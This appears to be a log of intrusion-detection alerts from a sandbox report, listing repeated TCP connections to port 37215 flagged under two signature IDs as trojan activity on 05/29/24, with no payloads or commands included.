                SID:2835222
                Source Port:48644
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.980198
                SID:2829579
                Source Port:45210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.060882
                SID:2829579
                Source Port:47280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728568
                SID:2835222
                Source Port:39718
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.418879
                SID:2829579
                Source Port:57292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612212
                SID:2835222
                Source Port:39488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316122
                SID:2835222
                Source Port:34848
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178101
                SID:2829579
                Source Port:36022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.582892
                SID:2829579
                Source Port:44428
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180304
                SID:2829579
                Source Port:37392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.071417
                SID:2829579
                Source Port:41284
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.178425
                SID:2835222
                Source Port:44180
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574656
                SID:2835222
                Source Port:59664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.035282
                SID:2829579
                Source Port:39836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.735013
                SID:2835222
                Source Port:54954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.528080
                SID:2835222
                Source Port:56896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652356
                SID:2829579
                Source Port:53760
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.763470
                SID:2829579
                Source Port:52716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.163568
                SID:2835222
                Source Port:35554
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502530
                SID:2835222
                Source Port:46566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555159
                SID:2835222
                Source Port:33136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883702
                SID:2829579
                Source Port:45250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281014
                SID:2829579
                Source Port:36018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.472335
                SID:2829579
                Source Port:50618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466580
                SID:2829579
                Source Port:57578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557844
                SID:2829579
                Source Port:51452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.032911
                SID:2829579
                Source Port:34036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.653126
                SID:2835222
                Source Port:42470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864534
                SID:2829579
                Source Port:42004
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.883059
                SID:2829579
                Source Port:43466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.525567
                SID:2829579
                Source Port:41454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.867923
                SID:2835222
                Source Port:38924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.433881
                SID:2835222
                Source Port:49784
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.362700
                SID:2829579
                Source Port:38614
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.420297
                SID:2829579
                Source Port:40072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.868231
                SID:2835222
                Source Port:38390
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864024
                SID:2835222
                Source Port:34152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.811754
                SID:2835222
                Source Port:33686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.286625
                SID:2835222
                Source Port:38368
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.574675
                SID:2829579
                Source Port:53142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990307
                SID:2829579
                Source Port:59662
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.447310
                SID:2829579
                Source Port:41444
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.631517
                SID:2829579
                Source Port:51880
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.785146
                SID:2829579
                Source Port:32966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948954
                SID:2835222
                Source Port:52754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.339182
                SID:2829579
                Source Port:55482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.183016
                SID:2835222
                Source Port:49748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.732870
                SID:2829579
                Source Port:42686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.728365
                SID:2835222
                Source Port:47620
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.046098
                SID:2829579
                Source Port:41576
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618047
                SID:2835222
                Source Port:39524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909921
                SID:2835222
                Source Port:60314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042383
                SID:2829579
                Source Port:43998
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945143
                SID:2829579
                Source Port:60668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.902191
                SID:2829579
                Source Port:53598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.189671
                SID:2829579
                Source Port:33952
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.559833
                SID:2829579
                Source Port:54710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.726459
                SID:2835222
                Source Port:59264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.785724
                SID:2835222
                Source Port:45932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.237477
                SID:2829579
                Source Port:36548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.832739
                SID:2829579
                Source Port:44262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574245
                SID:2835222
                Source Port:34376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.867593
                SID:2835222
                Source Port:47422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.715648
                SID:2835222
                Source Port:42578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.042514
                SID:2829579
                Source Port:54672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.434163
                SID:2829579
                Source Port:42618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667837
                SID:2835222
                Source Port:34438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.176657
                SID:2835222
                Source Port:34290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.075085
                SID:2829579
                Source Port:57546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.719590
                SID:2829579
                Source Port:45648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.532379
                SID:2835222
                Source Port:58084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.175469
                SID:2835222
                Source Port:56412
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.336369
                SID:2835222
                Source Port:37982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689117
                SID:2835222
                Source Port:51092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.946286
                SID:2829579
                Source Port:55812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.795865
                SID:2829579
                Source Port:56438
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.415950
                SID:2829579
                Source Port:54768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.900113
                SID:2829579
                Source Port:49618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.263939
                SID:2829579
                Source Port:34766
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.287026
                SID:2829579
                Source Port:60358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509660
                SID:2829579
                Source Port:39330
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.134685
                SID:2829579
                Source Port:38050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667819
                SID:2835222
                Source Port:46408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.948606
                SID:2829579
                Source Port:60298
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.903727
                SID:2835222
                Source Port:43460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.721693
                SID:2835222
                Source Port:56532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.071543
                SID:2835222
                Source Port:39682
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.023450
                SID:2835222
                Source Port:39338
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556780
                SID:2829579
                Source Port:51806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.667917
                SID:2835222
                Source Port:40924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.330155
                SID:2829579
                Source Port:34104
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:16.413608
                SID:2835222
                Source Port:35714
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.584824
                SID:2829579
                Source Port:32972
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.229061
                SID:2835222
                Source Port:59770
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.973355
                SID:2835222
                Source Port:41374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.328188
                SID:2829579
                Source Port:41246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.179559
                SID:2835222
                Source Port:43664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207707
                SID:2835222
                Source Port:34922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.231119
                SID:2835222
                Source Port:48876
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238797
                SID:2829579
                Source Port:32830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.834669
                SID:2835222
                Source Port:41454
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.872997
                SID:2835222
                Source Port:44018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.145042
                SID:2835222
                Source Port:35866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.652857
                SID:2829579
                Source Port:33588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.970428
                SID:2829579
                Source Port:46148
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464595
                SID:2835222
                Source Port:42672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.845219
                SID:2835222
                Source Port:51506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.184504
                SID:2835222
                Source Port:42544
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276743
                SID:2829579
                Source Port:33746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166353
                SID:2835222
                Source Port:51588
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652738
                SID:2835222
                Source Port:40844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947291
                SID:2835222
                Source Port:55188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.568328
                SID:2835222
                Source Port:33084
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.024577
                SID:2835222
                Source Port:42244
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.369714
                SID:2835222
                Source Port:58022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225526
                SID:2829579
                Source Port:46164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.869998
                SID:2835222
                Source Port:47668
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.375039
                SID:2829579
                Source Port:39604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899696
                SID:2829579
                Source Port:58162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783025
                SID:2835222
                Source Port:48994
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.862739
                SID:2829579
                Source Port:60260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.858203
                SID:2835222
                Source Port:46416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273707
                SID:2835222
                Source Port:51624
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207670
                SID:2835222
                Source Port:42410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.605698
                SID:2829579
                Source Port:49396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.846400
                SID:2835222
                Source Port:39078
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.989889
                SID:2829579
                Source Port:54358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.046244
                SID:2829579
                Source Port:53894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.799711
                SID:2829579
                Source Port:59396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.316402
                SID:2829579
                Source Port:60234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567447
                SID:2829579
                Source Port:44394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.899629
                SID:2835222
                Source Port:48404
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227594
                SID:2829579
                Source Port:54882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652441
                SID:2829579
                Source Port:54540
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.220816
                SID:2829579
                Source Port:55422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.583264
                SID:2829579
                Source Port:50726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.945903
                SID:2835222
                Source Port:56774
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.813505
                SID:2835222
                Source Port:48478
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.277724
                SID:2829579
                Source Port:57234
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.793908
                SID:2829579
                Source Port:37618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.929900
                SID:2829579
                Source Port:57852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437640
                SID:2829579
                Source Port:47512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.908427
                SID:2829579
                Source Port:43850
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.321266
                SID:2829579
                Source Port:49362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.181471
                SID:2835222
                Source Port:58980
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.737239
                SID:2835222
                Source Port:35674
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.849509
                SID:2829579
                Source Port:46366
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.010656
                SID:2835222
                Source Port:56274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074467
                SID:2835222
                Source Port:42242
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716632
                SID:2829579
                Source Port:40790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901059
                SID:2835222
                Source Port:56216
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.381659
                SID:2835222
                Source Port:39746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.282305
                SID:2829579
                Source Port:35002
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612391
                SID:2835222
                Source Port:59220
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.437096
                SID:2835222
                Source Port:60900
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.462240
                SID:2835222
                Source Port:40332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.687944
                SID:2829579
                Source Port:44878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210739
                SID:2835222
                Source Port:59184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.074042
                SID:2835222
                Source Port:36742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.978100
                SID:2829579
                Source Port:38150
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731051
                SID:2835222
                Source Port:40524
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562197
                SID:2829579
                Source Port:35182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.238986
                SID:2835222
                Source Port:44376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.880799
                SID:2829579
                Source Port:36342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916138
                SID:2835222
                Source Port:52450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.977247
                SID:2829579
                Source Port:40780
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015697
                SID:2835222
                Source Port:39828
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.665458
                SID:2835222
                Source Port:35290
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.543961
                SID:2829579
                Source Port:50516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.689588
                SID:2829579
                Source Port:47816
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.873481
                SID:2835222
                Source Port:58564
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436410
                SID:2835222
                Source Port:36812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.474697
                SID:2835222
                Source Port:51488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.681586
                SID:2835222
                Source Port:57480
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.977218
                SID:2835222
                Source Port:49498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.665899
                SID:2829579
                Source Port:48772
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.919720
                SID:2835222
                Source Port:45906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.994367
                SID:2829579
                Source Port:38112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.598002
                SID:2829579
                Source Port:34610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.233206
                SID:2835222
                Source Port:41642
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.535825
                SID:2835222
                Source Port:42236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968314
                SID:2835222
                Source Port:39090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794314
                SID:2829579
                Source Port:39836
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574260
                SID:2835222
                Source Port:43018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.869545
                SID:2829579
                Source Port:38050
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.145024
                SID:2829579
                Source Port:53574
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.908217
                SID:2829579
                Source Port:48566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.986724
                SID:2829579
                Source Port:47950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.571090
                SID:2829579
                Source Port:35302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.161015
                SID:2835222
                Source Port:37326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.169383
                SID:2829579
                Source Port:52660
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.025354
                SID:2835222
                Source Port:45782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.066790
                SID:2829579
                Source Port:60690
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.224475
                SID:2835222
                Source Port:33732
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.273563
                SID:2835222
                Source Port:42178
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.585125
                SID:2835222
                Source Port:53142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.166715
                SID:2829579
                Source Port:33182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.072271
                SID:2835222
                Source Port:53956
                Destination Port:37215
